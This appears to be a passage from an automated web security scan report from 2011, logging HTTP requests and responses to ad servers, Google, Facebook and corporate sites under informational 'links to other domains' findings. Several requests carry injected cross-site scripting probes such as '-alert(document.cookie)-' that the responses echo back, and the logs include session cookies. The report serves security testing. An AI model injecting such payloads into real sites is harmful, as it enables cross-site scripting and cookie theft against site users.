GET /pagead/ads?client=ca-pub-1894578950532504&output=html&h=90&slotname=3983344906&w=728&channel=9120656992_3996339198&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftools347ac'-alert(document.cookie)-'9f9a2e36974%2F&dt=1297710127289&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297710127294&frm=1&adk=2785858344&ga_vid=2067892625.1297710127&ga_sid=1297710127&ga_hid=1065518577&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1097&bih=1010&ifk=3932329480&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/index.php?option=com_ads&format=raw&w=728&ad=106&ord=353693237295374300&zone=home_page&kw=internet%20security%20news%2Chome%20security%2Ccybercrimes%2Cnetwork%20threats%2Cidentity%20theft%2Cinternet%20scams%2Ccomputer%20virus%20removal%2Csocial%20networks&sz=&token=a8a1f94d0e0aebfbc90d6bf95954acabbe45a2b7
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 19:01:51 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 1625

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe src='http://ad.media6degrees.com/adserv/cs?tId=12497909247337382|cb=1297710111|adType=iframe|cId=3211|ec=1|spId=27355|advId=971|exId=20|price=TVl8HgAMoucK5Wgls29b3PX_MoiUTYw1PBJRMA|pubId=56|secId=57|invId=135|notifyServer=asd146.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=|ctrack=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB9leAHnxZTefFMqXQlQfct72bC_-unYMCx9fN2ief_6ONYAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xODk0NTc4OTUwNTMyNTA0oAGLgMjrA7IBGXd3dy5zZWN1cml0eW5ld3NkYWlseS5jb226AQk3Mjh4OTBfYXPIAQnaAVFodHRwOi8vd3d3LnNlY3VyaXR5bmV3c2RhaWx5LmNvbS90b29sczM0N2FjJy1hbGVydChkb2N1bWVudC5jb29raWUpLSc5ZjlhMmUzNjk3NC-YAp4KwAIFyALR0c8MqAMB6AOdCegD4gXoA7sC6AO6AvUDAAAAxPUDEAAAAA%26num%3D1%26sig%3DAGiWqtzWDWiQGS9YdY2V3Kkt29cplZ3pbA%26client%3Dca-pub-1894578950532504%26adurl%3D' frameborder='0' scrolling='no' marginheight='0' marginwidth='0' topmargin='0' leftmargin='0' allowtransparency='true' width='728' height='90'></iframe>
...[SNIP]...

15.5. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1894578950532504&output=html&h=90&slotname=3983344906&w=728&channel=9120656992_3996339198&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.securitynewsdaily.com%2F6efdb'-alert(666)-'cf92265efad&dt=1297710079965&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297710079971&frm=1&adk=2785858344&ga_vid=1865981550.1297710080&ga_sid=1297710080&ga_hid=1762729161&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1097&bih=1010&ifk=786402333&eid=30143103&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/index.php?option=com_ads&format=raw&w=728&ad=106&ord=278707136632874620&zone=home_page&kw=internet%20security%20news%2Chome%20security%2Ccybercrimes%2Cnetwork%20threats%2Cidentity%20theft%2Cinternet%20scams%2Ccomputer%20virus%20removal%2Csocial%20networks&sz=&token=a8a1f94d0e0aebfbc90d6bf95954acabbe45a2b7
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 19:01:05 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4237

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.securitynewsdaily.com/6efdb%2527-alert(666)-%2527cf92265efad%26hl%3Den%26client%3Dca-pub-1894578950532504%26adU%3DClickability.com/CMS%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNG2FHfCU6vcYD8fCIk0v0hzsYNX5Q" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

15.6. http://linkhelp.clients.google.com/tbproxy/lh/fixurl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://linkhelp.clients.google.com
Path:   /tbproxy/lh/fixurl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /tbproxy/lh/fixurl?hl=en-US&sd=com&url=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftemplates%2Fsecurity_news_daily%2Fimages%2F3e1ce'-alert(document.cookie)-'a0f3e0810af&sourceid=chrome&error=http404 HTTP/1.1
Host: linkhelp.clients.google.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=43=obiPR5hLYFuxjHFaBKfW93ixnZDQ-VMz_DH1OlhaN-yePLjFDeS8n93BL0uLr8ZZRP1Q-oGTfRDUq959OW02bwIfnCKUYL1o77VaRxDLU1bMGiX_J_d5VFYuaFXTSXGL; PREF=ID=11a9f75446a95c33:U=af2eb0fc870398cf:FF=0:TM=1293845297:LM=1297558495:GM=1:S=6ZwDDuC1wBKi7F_t

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:58:02 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Server: linkdoctor/fixurlserver
X-XSS-Protection: 1; mode=block
Content-Length: 6984

<!DOCTYPE html><html lang="en" ><meta charset="utf-8" /><title>Oops! This link appears to be broken - www.securitynewsdaily.com/templates/security_news_daily/images/3e1ce&#39;-alert(document.cookie)-&
...[SNIP]...
<li>Go to <a href="http://www.securitynewsdaily.com/" onmousedown="return rwctrd(this,'hs','0','http://www.google.com/url?sa=D&q=http://www.securitynewsdaily.com/&usg=AFQjCNGe1MAHNMKsSOL5ZL5TijGdNSZ1VA');"><b>
...[SNIP]...

15.7. http://www.b2i.us/profiles/investor/contactus.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/investor/contactus.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /profiles/investor/contactus.asp?f=1&BzID=1475&to=cm&Nav=0&LangID=1&s=0 HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.mygovernancewebsite.com/requestinfo.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; server=66%2E111%2E109%2E155; cNav1475=0; cSite1475=0; cLang1475=1; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:42:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
pragma: no-cache
cache-control: private
Content-Length: 12228
Content-Type: text/html
Expires: Mon, 14 Feb 2011 18:41:30 GMT
Set-Cookie: server=66%2E111%2E109%2E155; path=/
Cache-control: no-cache
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>

<title>Request Information</title>

<META name="ROBOTS" content="NOFOLLOW">
</head>
<body bgcolor="#FFFFFF" l
...[SNIP]...
<td align="right"><a href="https://www.myb2i.com/Profiles/businessframed/index.asp?RID=279" target="_blank"><img src="http://www.b2i.cc/logos/1475/login.gif" alt="" border="0">
...[SNIP]...
<img src="http://www.b2i.cc/logos/1475/spot.gif" alt="" border="0"> <a href="http://www.webcastir.com/SlideShowView.asp?B=1475&S=MyGovernanceWebsite_2006_12_08" target=blank>Take the tour</a>
...[SNIP]...
<img src="http://www.b2i.cc/logos/1475/spot.gif" alt="" border="0"> <a href="http://www.mygovernancewebsite.com/requestinfo.htm" target="_top">Request Information</a>
...[SNIP]...
<br><a href="http://www.webcastir.com/SlideShowView.asp?B=1475&S=MyGovernanceWebsite_2006_12_08" target=blank><img src="http://www.b2i.cc/logos/1475/tour.gif" alt="" border="0">
...[SNIP]...
<br /><a class="" href="https://www.myb2i.com/development/demoadmin/" target=_"blank"><img alt="" src="http://www.b2i.cc/logos/1475/calendar.jpg" align="left" border="0" />
...[SNIP]...

15.8. http://www.b2i.us/profiles/investor/fullpage.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/investor/fullpage.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /profiles/investor/fullpage.asp?f=1&BzID=1475&to=cp&Nav=0&LangID=1&s=0&ID=5606 HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.mygovernancewebsite.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cSite1475=0; cNav1475=0; cLang1475=1; ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:42:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
pragma: no-cache
cache-control: private
Content-Length: 11561
Content-Type: text/html
Expires: Mon, 14 Feb 2011 18:41:12 GMT
Set-Cookie: server=66%2E111%2E109%2E155; path=/
Cache-control: no-cache
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META NAME="keywords" content="Corporate Governance, corporate governance web sites, investor relations web sites, in
...[SNIP]...
<td align="right"><a href="https://www.myb2i.com/Profiles/businessframed/index.asp?RID=279" target="_blank"><img src="http://www.b2i.cc/logos/1475/login.gif" alt="" border="0">
...[SNIP]...
<img src="http://www.b2i.cc/logos/1475/spot.gif" alt="" border="0"> <a href="http://www.webcastir.com/SlideShowView.asp?B=1475&S=MyGovernanceWebsite_2006_12_08" target=blank>Take the tour</a>
...[SNIP]...
<img src="http://www.b2i.cc/logos/1475/spot.gif" alt="" border="0"> <a href="http://www.mygovernancewebsite.com/requestinfo.htm" target="_top">Request Information</a>
...[SNIP]...
<map name="webcast">
<area alt="Take the tour" coords="175,191,297,303" href="http://www.webcastir.com/SlideShowView.asp?B=1475&S=MyGovernanceWebsite_2006_12_08" target="_blank">
</map>
...[SNIP]...

15.9. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftools%2F&title=Security+Tools+%26+Resources&layout=button_count&show_faces=true&width=100&action=like&font=trebuchet+ms&colorscheme=light&height=25 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/tools/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwashingtonpost.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.washingtonpost.com%252Fwp-dyn%252Fcontent%252Farticle%252F2011%252F02%252F13%252FAR2011021301463.html%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 14 Feb 2011 18:57:28 GMT
Content-Length: 7736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/y_/r/txqM0K8lHHk.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/y_/r/Thkb_AZ80FK.js"></script>
...[SNIP]...

15.10. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Hunton+%26+Williams HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=43=obiPR5hLYFuxjHFaBKfW93ixnZDQ-VMz_DH1OlhaN-yePLjFDeS8n93BL0uLr8ZZRP1Q-oGTfRDUq959OW02bwIfnCKUYL1o77VaRxDLU1bMGiX_J_d5VFYuaFXTSXGL; PREF=ID=11a9f75446a95c33:U=af2eb0fc870398cf:FF=0:TM=1293845297:LM=1297558495:GM=1:S=6ZwDDuC1wBKi7F_t

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:56:13 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/rU20-FBA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 67013

<!doctype html><head><title>Hunton &amp; Williams - Google Search</title><script>window.google={kEI:"zXpZTfK5McSblge7tOzOBw",kEXPI:"17259,20782,23633,28290,28305,28317,28510,28641,28663,28752",kCSI:{e
...[SNIP]...
</div><a id="gb_36" href="http://www.youtube.com/results?q=Hunton+%26+Williams&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hunton.com/" class=l onmousedown="return rwt(this,'','','','1','AFQjCNHQX5VHXF-eGc4PujJ0oga8sw6Tbg','','0CCQQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:2pYQmHUf5m4J:www.hunton.com/+Hunton+%26+Williams&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCNFdV9JROffoUa2Ig3g7ahmeyRcqOA','','0CCkQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.hunton.com/bios/people.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNH3Ofs6fEVAAEYdVTrrGk60XvkZmA','','0CCsQqwMoADAA')">Bios Search</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.hunton.com/firm/firm.aspx?id=5118" onmousedown="return rwt(this,'','','','1','AFQjCNF1niqV7VE2innJjxb3llYkfNpT5w','','0CCwQqwMoATAA')">Offices</a></div><div class=sld><a class=sla href="http://www.hunton.com/info.aspx?id=5248" onmousedown="return rwt(this,'','','','1','AFQjCNEqtkDpZj22VmtWVdbXjT1651QkJQ','','0CC0QqwMoAjAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.hunton.com/practices/practices.aspx?tab=0001" onmousedown="return rwt(this,'','','','1','AFQjCNFwPIXs472Iybg2FtvkITtQvQY8yA','','0CC4QqwMoAzAA')">Practices</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.hunton.com/search/search.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNGtHE06EcTFMvgZqBk3WJiNCzKt_g','','0CC8QqwMoBDAA')">Search</a></div><div class=sld><a class=sla href="http://www.hunton.com/firm/firm.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNEsMNe9BOMdgPN-Y2acjlmch6qOnw','','0CDAQqwMoBTAA')">Hunton &amp; Williams Overview</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.hunton.com/news/news_events.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNHFstV3fVt-N8fYAiN8qOi7q_qGgg','','0CDEQqwMoBjAA')">News &amp; Events</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.hunton.com/home.aspx?tab=2000" onmousedown="return rwt(this,'','','','1','AFQjCNFrOuqBspmOeBlzDPJa5fdfJLtWng','','0CDIQqwMoBzAA')">Achievements</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hunton.com/bios/people.aspx" class=l onmousedown="return rwt(this,'','','','2','AFQjCNH3Ofs6fEVAAEYdVTrrGk60XvkZmA','','0CDUQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:twv2XoaBANsJ:www.hunton.com/bios/people.aspx+Hunton+%26+Williams&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCNEM30edtpq2sOklIemhm_dv4Kr4fg','','0CDoQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hunton.com/firm/firm.aspx?id=5118" class=l onmousedown="return rwt(this,'','','','3','AFQjCNF1niqV7VE2innJjxb3llYkfNpT5w','','0CDwQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:4JkKNQQSI7YJ:www.hunton.com/firm/firm.aspx%3Fid%3D5118+Hunton+%26+Williams&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return rwt(this,'','','','3','AFQjCNEzLrIp9lxAIsKdw5cA6YHx0cK13A','','0CEEQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hunton.com/practices/practices.aspx?tab=0001" class=l onmousedown="return rwt(this,'','','','4','AFQjCNFwPIXs472Iybg2FtvkITtQvQY8yA','','0CEMQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:noD5Tuni3R0J:www.hunton.com/practices/practices.aspx%3Ftab%3D0001+Hunton+%26+Williams&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return rwt(this,'','','','4','AFQjCNGN5IuGfWoYEm0MaRd5b10CvU1JUQ','','0CEgQIDAD')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://www.alternet.org/teaparty/149907/us_chamber_linked_to_shady_companies_in_effort_to_smear_political_opponents/" class=l onmousedown="return rwt(this,'','','','5','AFQjCNFH7JlWtXcCu82wFW8oGdsYzyn3BA','','0CEsQqQIwBA')">US Chamber Linked to Shady Companies In Effort to Smear Political <b>
...[SNIP]...
<span class=tl><a href="http://feeds.nytimes.com/click.phdo?i=2825d260d257ab8038976b6eacbee6b1" class=l onmousedown="return rwt(this,'','','','6','AFQjCNFxWr98m76dmkMcTQ7LxxYmUZXg5w','','0CFIQqQIwBQ')">Hackers Reveal Offers to Spy on Corporate Rivals</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Hunton_%26_Williams" class=l onmousedown="return rwt(this,'','','','7','AFQjCNGlw6qDoAT-PidOmIvTX6VITbKQMQ','','0CFsQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:HcDem_0vTA4J:en.wikipedia.org/wiki/Hunton_%2526_Williams+Hunton+%26+Williams&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNHE1fx3jlYywguQuGYK-mLZ6EhByQ','','0CGAQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://abovethelaw.com/hunton-williams/" class=l onmousedown="return rwt(this,'','','','8','AFQjCNF3L4i-MrptaGlmEsjChhnrvEyM2Q','','0CGEQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:lCgArEMYg7AJ:abovethelaw.com/hunton-williams/+Hunton+%26+Williams&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return rwt(this,'','','','8','AFQjCNFa7s7L18Wq58Cu9ohPvIUBor1rHw','','0CGYQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Hunton-Williams-LLP/law-firm-304213.htm" class=l onmousedown="return rwt(this,'','','','9','AFQjCNFPLBH2zspm6ljgZstAzvbEmwSGeg','','0CGcQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:lkLKKGtNzHYJ:www.martindale.com/Hunton-Williams-LLP/law-firm-304213.htm+Hunton+%26+Williams&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return rwt(this,'','','','9','AFQjCNEGQopXgCPnV3_KRRr_G3uErTJcYw','','0CGwQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://huntonandwilliamssued.com/" class=l onmousedown="return rwt(this,'','','','10','AFQjCNEmIPi8xh8dv3S4tzM2duVqn-hHfQ','','0CG4QFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:FnNsZ0Ciz0UJ:huntonandwilliamssued.com/+Hunton+%26+Williams&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNELpNiwBlIRzLqNNxOoRCxWtAwmzg','','0CHMQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.huntonprivacyblog.com/2011/02/articles/general/hunton-williams-uncontested-as-top-privacy-adviser-in-computerworld-poll/" class=l onmousedown="return rwt(this,'','','','11','AFQjCNHXtHl1VYpWgp4vxA05mSoywQuDhg','','0CHUQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:O70_K_lkReIJ:www.huntonprivacyblog.com/2011/02/articles/general/hunton-williams-uncontested-as-top-privacy-adviser-in-computerworld-poll/+Hunton+%26+Williams&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return rwt(this,'','','','11','AFQjCNHeOA7eXgMeYeIJ7jxrycz7Oj06bg','','0CHwQIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.vault.com/wps/portal/usa/companies/company-profile/Hunton-&amp;-Williams-LLP?companyId=1638" class=l onmousedown="return rwt(this,'','','','12','AFQjCNHGjq6gXpFeVRmYzHtgDwhWE-qYdA','','0CH0QFjAL')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:D59Nqvv83kwJ:www.vault.com/wps/portal/usa/companies/company-profile/Hunton-%26-Williams-LLP%3FcompanyId%3D1638+Hunton+%26+Williams&amp;cd=12&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return rwt(this,'','','','12','AFQjCNF1SnQ21QpcH5a2ZNwi2BFdIpG9hA','','0CIIBECAwCw')">Cached</a>
...[SNIP]...

15.11. http://www.hidglobal.com/page.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /page.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /page.php?page_id=223 HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.1.10.1297708154; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=tsr2bhqkbe82vdltq8p1hv3r43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
